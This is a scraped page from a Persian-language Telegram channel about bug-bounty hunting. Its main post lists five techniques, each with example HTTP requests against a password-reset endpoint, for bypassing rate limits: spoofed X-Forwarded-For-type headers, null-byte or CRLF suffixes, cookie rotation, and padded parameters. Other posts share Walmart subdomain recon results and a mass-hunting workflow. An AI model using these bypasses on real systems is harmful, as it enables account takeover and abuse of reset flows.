NEW BOT Телеграм, страница - 506103047

CyberSecurity

901 subscribers

122 photos

26 videos

73 files

145 links

Welcome to dark hell

‌ ما از دانش خود برای مهندسی دنیایی امن ‌تر استفاده می‌کنیم 🔐

Download Telegram

About

Blog

Apps

Platform

901 subscribers

This media is not supported in your browser

VIEW IN TELEGRAM

😈3

429 views08:48

برای دور زدن rate limit می توان از روش های زیر استفاده کرد:

۱- افزودن header های سفارشی زیر
X-Forwarded-For : 127.0.0.1
X-Forwarded-Host : 127.0.0.1
X-Client-IP : 127.0.0.1
X-Remote-IP : 127.0.0.1
X-Remote-Addr : 127.0.0.1
X-Host : 127.0.0.1
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
X-Forwarded-For : 127.0.0.1
[...]

email=victim@gmail.com

۲- افزودن نال بایت (%00) و یا CLRF(%09, %0d, %0a) به انتهای مقدار پارامتر مورد نظر
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com%00

۳-تغییر IP یا کوکی ها یا user-agent
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: xxxxxxxxxx
[...]

email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php HTTP/1.1
Host: target.com
Cookie: aaaaaaaaaaaaa
[...]

email=victim@gmail.com

۴- افزودن مقدار تصادفی به انتهای endpoint
مثال:
POST /ForgotPass.php HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com
که به صورت زیر استفاده می شود:
POST /ForgotPass.php?random HTTP/1.1
Host: target.com
[...]

email=victim@gmail.com

۵- افزودن space به انتهای مقدار پارامتر
مثال:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]

{"email":"victim@gmail.com"}
که به صورت زیر استفاده می شود:
POST /api/forgotpass HTTP/1.1
Host: target.com
[...]

{"email":"victim@gmail.com "}

👌3👍1

576 views09:02

سید بنواز که عالی مینوازی امروز😂

👍2

525 views09:02

This media is not supported in your browser

VIEW IN TELEGRAM

ایلان ماسک: تراشه جدید ما می‌تونه به افراد نابینا، قدرت بینایی بده.

💡 ایلان ماسک، مدیرعامل Neuralink در رویداد Show and Tell اعلام کرد که با تراشه‌های این شرکت می‌توان به افراد با مشکلات بینایی کمک کرد و حتی بینایی را به افرادی که از ابتدا نابینا بودند هم برگرداند.
‌
دانش و تکنولوژی (معجزه بشر) نابینایان رو بینا خواهد کرد.

نکته: آنها بینایی و ما بینش را با صیانت فراهم خواهیم کرد.
@matitanium

563 views06:43

برا همه هانترای چنل ...😂🤤

😈4❤1👍1

474 views07:38

Forwarded from Deleted Account

new @asset find _
Domain: https://ww31.corporate-walmart.com
ip : 208.91.196.94
status-code: 200

462 views15:38

Forwarded from Deleted Account

new @asset find _
Domain: https://ww17.corporate-walmart.com
ip : 208.91.196.95
status-code: 200

467 views15:38

Forwarded from Deleted Account

new @asset find _
Domain: https://m.walmart.com.br
ip : 35.198.48.77
status-code: 302

BIG | Hipermercado - Frete grátis na 1a compra

Compre no site do BIG com praticidade, conforto e economia. Aproveite nossas ofertas imperdíveis!

❤1

502 views15:38

Deleted Account

new @asset find _ Domain: https://m.walmart.com.br ip : 35.198.48.77 status-code: 302

510 views15:44

520 views15:56

asset discovery --> find ip(DNSX and etc...) --> cut cdn --> httpx --> check manually -> = easy vulnerablity 😈

یه فلو تویه mass hunting 😉

😈1

544 views14:03

uncover from project discovery👍

591 views14:14

uncover from project discovery👍

👍2

613 views14:23

today tip:
some times original ip leaked in history👍
like: securityTrials👌
@matitanium

645 viewsedited 11:33

Forwarded from Deleted Account

Hi
New Wide company join in bug bounty:D

scope: *.tokensvc.com

👍1

574 views15:02

Deleted Account

Hi New Wide company join in bug bounty:D scope: *.tokensvc.com

تازه تازه همین الان اومد

577 views15:02

information disclosure doork

593 views23:23

xss
اینم امشب تا ببینیم چطور پیش میره😂

😈1

635 views20:18

xss اینم امشب تا ببینیم چطور پیش میره😂

668 views20:18

خیلیا متاسفانه با مفهوم کلی DNS اشنا نیستن بریم برا توضیحش!

637 views10:27

dns کابرد گسترده ای در دنیای تکنولوژی داره

644 views10:27